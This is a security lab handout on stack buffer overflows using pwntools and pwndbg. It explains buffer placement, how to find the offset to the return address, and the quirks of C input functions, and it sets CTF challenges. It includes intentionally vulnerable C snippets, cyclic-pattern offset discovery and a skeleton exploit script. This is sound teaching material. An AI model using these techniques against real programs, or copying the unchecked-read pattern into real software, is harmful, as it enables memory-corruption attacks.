Buffer Exploitation

Pwntools

In this lab we will use the pwntools Python module to solve the tasks. Check out the Pwntools Tutorial section.

Buffers

A buffer is an area of contiguous data in memory, determined by a starting address, contents and length. Understanding how buffers are used (or misused) is vital for both offensive and defensive purposes. In C, we can declare a buffer of bytes as a char array, as follows:

char local_buffer[32];

This results in the following assembly code:

push   rbp
mov    rbp,rsp
sub    rsp,0x20
...
ret

Notice that buffer allocation is done by simply subtracting its intended size from the current stack pointer (sub rsp, 0x20). This reserves space on the stack (remember that on x86 the stack grows downwards, from higher addresses to lower ones).

A compiler may allocate more space on the stack than explicitly required due to alignment constraints or other hidden values. To exploit a program, the C source code may not be a good enough reference point for stack offsets. Only disassembling the executable will provide relevant information.
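As a rough illustration of why the reserved size can differ from the declared size, the sketch below rounds a frame's contents up to a 16-byte boundary. The 16-byte alignment and the 8-byte hidden value are assumptions typical of x86-64 Linux builds, and the helper name round_up is hypothetical. Real compilers may lay out frames differently, so the disassembly remains the reference.

```python
def round_up(size, alignment=16):
    """Round size up to the next multiple of alignment (a power of two)."""
    return (size + alignment - 1) & ~(alignment - 1)


# A 32-byte buffer already ends on a 16-byte boundary.
print(hex(round_up(32)))       # 0x20

# A 128-byte buffer plus an assumed 8-byte hidden value needs padding.
print(hex(round_up(128 + 8)))  # 0x90
```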

Buffers can also be stored in other places in memory, such as the heap, .bss, .data or .rodata.

Analyze and compile the following snippet (also present in the lab files, go to 00-tutorial and run make buffers):

#include <stdio.h>
#include <stdlib.h>

char g_buf_init_zero[32] = {0};
/* g_buf_init_vals[5..31] will be 0 */
char g_buf_init_vals[32] = {1, 2, 3, 4, 5};
const char g_buf_const[32] = "Hello, world\n";

int main(void)
{
    char l_buf[32];
    static char s_l_buf[32];
    char *heap_buf = malloc(32);

    free(heap_buf);

    return 0;
}

Check the common binary sections and symbols. Use the usual commands (readelf -S, nm). Observe in which section each variable is located and the section flags.

$ readelf -S buffers
...
  [16] .rodata           PROGBITS         0000000000402000  00002000
       0000000000000040  0000000000000000   A       0     0     32
...
  [24] .data             PROGBITS         0000000000404040  00003040
       0000000000000040  0000000000000000  WA       0     0     32
  [25] .bss              NOBITS           0000000000404080  00003080
       0000000000000060  0000000000000000  WA       0     0     32
...
Key to Flags:
  W (write), A (alloc), X (execute)

$ nm buffers
...
0000000000402020 R g_buf_const
0000000000404060 D g_buf_init_vals
00000000004040a0 B g_buf_init_zero

Key to Flags:
  R (symbol is read-only)
  D (symbol in initialized data section)
  B (symbol in BSS data section)

  A lowercase flag means the symbol is local (not visible outside the object file)

You can also inspect these programmatically using pwntools and the ELF class:

from pwn import *

elf = ELF('buffers')

bss    = elf.get_section_by_name('.bss')
data   = elf.get_section_by_name('.data')
rodata = elf.get_section_by_name('.rodata')

bss_addr    = bss['sh_addr']
data_addr   = data['sh_addr']
rodata_addr = rodata['sh_addr']

bss_size = bss['sh_size']
data_size = data['sh_size']
rodata_size = rodata['sh_size']

# A (Alloc) = 1 << 1 = 2
# W (Write) = 1 << 0 = 1
bss_flags    = bss['sh_flags']
data_flags   = data['sh_flags']
rodata_flags = rodata['sh_flags']

print("Section info:")
print(".bss:    0x{:08x}-0x{:08x}, {}".format(bss_addr, bss_addr+bss_size, bss_flags))
print(".data:   0x{:08x}-0x{:08x}, {}".format(data_addr, data_addr+data_size, data_flags))
print(".rodata: 0x{:08x}-0x{:08x}, {}".format(rodata_addr, rodata_addr+rodata_size, rodata_flags))

print()

print("Variable info:")
print("g_buf_init_zero: 0x{:08x}".format(elf.symbols.g_buf_init_zero))
print("g_buf_init_vals: 0x{:08x}".format(elf.symbols.g_buf_init_vals))
print("g_buf_const:     0x{:08x}".format(elf.symbols.g_buf_const))
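The script above prints sh_flags as a plain number. A small helper can turn that number back into the letters readelf shows. This is a minimal sketch: the function name decode_section_flags is hypothetical, and it handles only the three flags listed in the readelf key above.

```python
# Flag bit values as defined by the ELF specification.
SHF_WRITE = 0x1      # W
SHF_ALLOC = 0x2      # A
SHF_EXECINSTR = 0x4  # X


def decode_section_flags(flags):
    """Return readelf-style letters (W, A, X) for a numeric sh_flags value."""
    letters = ""
    if flags & SHF_WRITE:
        letters += "W"
    if flags & SHF_ALLOC:
        letters += "A"
    if flags & SHF_EXECINSTR:
        letters += "X"
    return letters


print(decode_section_flags(3))  # WA, as for .data and .bss
print(decode_section_flags(2))  # A, as for .rodata
```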

Another handy utility is the vmmap command in pwndbg which shows all memory maps of the process at runtime:

pwndbg> b main
pwndbg> run
pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
          0x400000           0x401000 r--p     1000 0      /home/user/buffers
          0x401000           0x402000 r-xp     1000 1000   /home/user/buffers
          0x402000           0x403000 r--p     1000 2000   /home/user/buffers
          0x403000           0x404000 r--p     1000 2000   /home/user/buffers
          0x404000           0x405000 rw-p     1000 3000   /home/user/buffers
    0x7ffff7dc9000     0x7ffff7dcb000 rw-p     2000 0
...
    0x7ffffffdd000     0x7ffffffff000 rw-p    22000 0      [stack]
0xffffffffff600000 0xffffffffff601000 --xp     1000 0      [vsyscall]

Non-static local variables and dynamically allocated buffers cannot be seen in the executable (they have meaning only at runtime, because they are allocated on the stack or heap in a function scope). The symbol names aren't found anywhere in the binary, except if debug symbols are enabled (-g flag).

Stack Buffer Overflow

[Figure: Stack Overflow]

Note that this is the stack of a 64-bit system, where the first six integer or pointer function arguments are passed in registers (rdi, rsi, rdx, rcx, r8 and r9). That is why the figure shows arg_6 as the first argument on the stack.

We should know by now that the stack serves multiple purposes:

Passing function arguments from the caller to the callee
Storing local variables for functions
Temporarily saving register values before a call
Saving the return address and old frame pointer

Even though, in an abstract sense, different buffers are separate from one another, ultimately they are just regions of memory that have no intrinsic identification or associated size, so nothing stops a write from running past the end of one buffer into its neighbour. To avoid this, most high-level languages use size metadata and bounds checks to detect out-of-bounds memory accesses.

But in our case, bounds are unchecked, therefore it is up to the programmer to code carefully. This includes checking for any overflows and using safe functions. Unfortunately, many functions in the standard C library, particularly those which work with strings and read user input, are unsafe - nowadays, the compiler will issue warnings when encountering them.
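To make the lack of bounds concrete, here is a minimal sketch that uses Python's ctypes module to copy raw bytes into a structure without any size check. The Frame layout and its field names are hypothetical, and the copy is kept within the structure's own size so the demonstration stays safe.

```python
import ctypes


class Frame(ctypes.Structure):
    # Hypothetical layout: an 8-byte buffer followed directly by another value.
    _fields_ = [
        ("buf", ctypes.c_char * 8),
        ("neighbour", ctypes.c_uint32),
    ]


frame = Frame()
frame.neighbour = 0x11223344

# 12 bytes written into an 8-byte buffer: the last 4 land in the neighbour.
data = b"A" * 8 + b"B" * 4
assert len(data) <= ctypes.sizeof(frame)  # stay inside the structure
ctypes.memmove(ctypes.addressof(frame), data, len(data))

print(hex(frame.neighbour))  # 0x42424242
```

The unchecked copy knows nothing about where buf ends, which is exactly the situation with the unsafe C library functions mentioned above.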

Buffer Size and Offset Identification

When trying to overflow a buffer on the stack we need to know the size and where the buffer is in memory relative to the saved return address (or some other control flow altering value/pointer).

Static Analysis

For simple programs, one way is to do static analysis and check some key points in the disassembled code.

For example, this simple program (00-tutorial/simple_read, run make simple_read to compile):

#include <stdio.h>

int main(void) {
    char buf[128];
    fread(buf, 1, 256, stdin);
    return 0;
}

generates one of the following assembly listings, depending on the compiler flags. With the stack protector enabled, a canary is loaded from fs:0x28 and stored at rbp-0x8, and the buffer starts at rbp-0x90:

push   rbp
mov    rbp,rsp
sub    rsp,0x90
mov    rax,QWORD PTR fs:0x28
mov    QWORD PTR [rbp-0x8],rax
xor    eax,eax
# --- important bit ---
mov    rdx,QWORD PTR [rip+0x2ed6]        # 4040 <stdin@@GLIBC_2.2.5>
lea    rax,[rbp-0x90]                    # <- stack buffer starts at rbp-0x90
mov    rcx,rdx                           # <- 4th argument of fread, stdin
mov    edx,0x100                         # <- 3rd argument of fread, number of elements read
mov    esi,0x1                           # <- 2nd argument of fread, size of element
mov    rdi,rax                           # <- 1st argument of fread (buffer address saved in RAX)
call   1030 <fread@plt>

Without the stack protector, which is the variant analyzed below, the buffer starts at rbp-0x80:

push   rbp
mov    rbp,rsp
add    rsp,0xffffffffffffff80
# --- important bit ---
mov    rdx,QWORD PTR [rip+0x2efb]        # 404030 <stdin@@GLIBC_2.2.5>
lea    rax,[rbp-0x80]  # <- stack buffer starts at rbp-0x80
mov    rcx,rdx         # <- 4th argument of fread, stdin
mov    edx,0x100       # <- 3rd argument of fread, number of elements read
mov    esi,0x1         # <- 2nd argument of fread, size of element
mov    rdi,rax         # <- 1st argument of fread (buffer address saved in RAX)
call   401030 <fread@plt>
# ---------------------
mov    eax,0x0
leave
ret

Looking at the fread arguments, we can see where the buffer starts relative to RBP and how many bytes are read. RBP-0x80 + 0x100*0x1 = RBP+0x80, so fread can write up to 128 bytes past RBP. The saved RBP occupies the 8 bytes at RBP and the return address is stored at RBP+0x8, that is, 0x80 + 0x8 = 136 bytes from the start of the buffer.
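The offset arithmetic can be turned into a payload layout with nothing more than the standard library. This is a sketch under stated assumptions: TARGET_ADDRESS is a hypothetical placeholder rather than an address from the binary, and the padding to 256 bytes reflects that fread(buf, 1, 256, stdin) keeps reading until it has 256 bytes or reaches EOF.

```python
import struct

BUF_OFFSET_FROM_RBP = 0x80  # buffer starts at rbp-0x80 (from the listing)
SAVED_RBP_SIZE = 8          # the saved frame pointer sits at rbp
READ_SIZE = 0x100           # size * nmemb passed to fread

# Distance from the start of the buffer to the saved return address.
offset = BUF_OFFSET_FROM_RBP + SAVED_RBP_SIZE
print(offset)  # 136

TARGET_ADDRESS = 0x401136   # hypothetical address, for illustration only

payload = b"A" * offset                      # fill the buffer and saved RBP
payload += struct.pack("<Q", TARGET_ADDRESS)  # little-endian 64-bit address
payload = payload.ljust(READ_SIZE, b"\x00")   # pad so fread returns without EOF

print(len(payload))  # 256
```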

[Figure: Stack Buffer]

Dynamic Analysis

You can determine offsets at runtime in a more automated way with pwndbg by using a De Bruijn sequence: a string in which every substring of length N appears exactly once. In our case, it helps us identify the offset of an exploitable memory value relative to the buffer.

For a simple buffer overflow the workflow is:

generate a sequence long enough to guarantee a buffer overflow
feed the generated sequence to the input function in the program
the program will produce a segmentation fault when reaching the invalid return address on the stack
look up the faulty address in the generated pattern to get its offset

In pwndbg this works as such:

pwndbg> cyclic -n 8 256
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaab
pwndbg> run
...
pwndbg>
<reading input, paste the generated pattern>
...
pwndbg> continue
...
Program received signal SIGSEGV, Segmentation fault
...
   0x401141 <main+27>    mov    esi, 1
   0x401146 <main+32>    mov    rdi, rax
   0x401149 <main+35>    call   fread@plt <fread@plt>

   0x40114e <main+40>    mov    eax, 0
   0x401153 <main+45>    leave
 ► 0x401154 <main+46>    ret    <0x6161616161616172>
...
pwndbg> cyclic -n 8 -c 64 -l 0x6161616161616172
136

Note: We get the same 136 offset computed manually with the static analysis method.
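To see what the cyclic command does under the hood, the sketch below generates a De Bruijn sequence lazily in plain Python and looks up the faulting value. It uses the standard Lyndon-word construction over a lowercase alphabet. The function names de_bruijn and cyclic_find are chosen here for illustration, and this is not claimed to be the exact implementation pwndbg uses.

```python
import string
import struct
from itertools import islice


def de_bruijn(alphabet, n):
    """Lazily yield a De Bruijn sequence over alphabet for substrings of length n."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic_find(pattern, value):
    """Return the offset of a 64-bit little-endian value inside pattern."""
    return pattern.find(struct.pack("<Q", value))


# Take only the first 256 bytes; the full sequence is far too long to build.
pattern = "".join(islice(de_bruijn(string.ascii_lowercase, 8), 256)).encode()

print(pattern[:24])                              # b'aaaaaaaabaaaaaaacaaaaaaa'
print(cyclic_find(pattern, 0x6161616161616172))  # 136
```

The value is packed as little-endian because that is how the 8 bytes taken from the pattern were loaded from the stack on x86-64.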

Input-Output Functions

Most programs aren't a straightforward single-input buffer overflow, so we need to deal with things like:

automating program input-output - by programmatically sending and receiving data
parsing program output - to use potential leaked information
understanding the mechanics of the IO methods used - what kind of data they accept and possible constraints

pwntools offers a wide array of IO functions to communicate with a program (either local or remote). The basic and usual ones are:

send(data) - sends the data byte string to the process
sendline(data) - shorthand for send(data + b"\n")
recv(num) - receives num bytes from the process
recvline() - receives a whole line from the process (until '\n')
recvuntil(str) - receives data until str is found (the returned data includes str unless drop=True is passed)
recvall() - receives the full program output (until EOF)

Check the documentation for more complex IO functions that might come in handy (like recvregex, sendafter).

It is also important to understand the functionality of the different IO functions the program itself uses. For C programs, in our case, you can always find useful information in the man pages of specific functions:

size_t fread(void *ptr, size_t size, size_t nmemb, FILE *stream): Reads nmemb items of data, each size bytes long, simple and straightforward.
char *gets(char *s): Reads until either a terminating newline or EOF, which it replaces with a null byte ('\0'). The problem here is that you can't have a newline in the middle of your payload. Note that it has no size argument, so it keeps reading until it reaches a newline or EOF.
char *fgets(char *s, int size, FILE *stream): Reads in at most one less than size characters from stream and stores them into the buffer pointed to by s. Reading stops after an EOF or a newline. If a newline is read, it is stored into the buffer. A terminating null byte ('\0') is stored after the last character in the buffer. This one adds the size limit argument, but also note that it stores the newline in the string and adds the null byte after it (in contrast to gets).
int scanf(const char *format, ...): Unlike the other functions, scanf reads text according to the format string and parses it. Don't make the common mistake of sending binary data to scanf: for example, "%d" expects the string representation of a number, like "16", not binary data like "\x00\x00\x00\x10".
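Two of the constraints above are easy to check before sending anything. The sketch below contrasts the text and binary forms of the number 16 and tests whether a payload would be cut short by gets. The helper name safe_for_gets and the sample address are hypothetical.

```python
import struct

number = 16

# What scanf("%d") expects: the decimal digits as text.
text_form = str(number).encode()
print(text_form)    # b'16'

# The raw 4-byte encoding (big-endian here, matching the bytes quoted above).
binary_form = struct.pack(">I", number)
print(binary_form)  # b'\x00\x00\x00\x10'


def safe_for_gets(payload):
    """Return True if gets() would read the whole payload (no newline inside)."""
    return b"\n" not in payload


# A hypothetical address containing the byte 0x0a would truncate the payload.
bad_address = struct.pack("<Q", 0x40110A)
print(safe_for_gets(b"A" * 8))                # True
print(safe_for_gets(b"A" * 8 + bad_address))  # False
```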

Every time you encounter a new input function, check the documentation to find its limitations.

Challenges

01. Challenge: Parrot

Some programs feature a stack smashing protection in the form of stack canaries, that is, values kept on the stack which are checked before returning from a function. If the value has changed, the check concludes that stack data was corrupted during the execution of the current function.

We have implemented our very own parrot. Can you avoid it somehow?

02. Challenge: Indexing

More complex programs require some form of protocol or user interaction. This is where pwntools shines. Here's an interactive script to get you started:

    #!/usr/bin/env python
    from pwn import *

    p = process('./indexing')

    # Give index
    p.recvuntil(b'Index: ')
    p.sendline()  # TODO (must be a byte string)

    # Give value
    p.recvuntil(b'Value: ')
    p.sendline()  # TODO (must be a byte string)
    p.interactive()

Go through GDB when aiming to solve this challenge. As all input values are strings, you can input them at the keyboard and follow their effect in GDB.

03. Challenge: smashthestack Level7

Now you can tackle a real challenge. See if you can figure out how you can get a shell from this one.

Hints:

There's an integer overflow + buffer overflow in the program.
How does integer multiplication work at a low level? Can you get a positive number by multiplying a negative number by 4?
To pass command-line arguments in gdb use run arg1 arg2 ... or set args arg1 arg2 ... before a run command
In pwntools you can pass a list to process: process(['./level07', arg1, arg2])
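Python integers never overflow, so fixed-width arithmetic has to be simulated when experimenting with the second hint. The sketch below assumes a signed 32-bit int, which is an assumption about the target rather than something stated in the challenge. The helper name to_int32 is hypothetical.

```python
def to_int32(value):
    """Interpret the low 32 bits of value as a signed 32-bit integer."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value


count = -2147483647          # a negative 32-bit value
print(to_int32(count * 4))   # 4: the high bits are discarded by the wraparound
```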

04. Challenge: Neighbourly

Let's overwrite a structure's function pointer using a buffer overflow in its vicinity. The principle is the same.

05. Challenge: Input Functions

Along the same lines as the "Indexing" challenge, but much harder. Carefully check what input functions are used and craft your input accordingly.

06. Challenge: Bonus: Birds

Time for a more complex challenge. Be patient and don't speed through it.
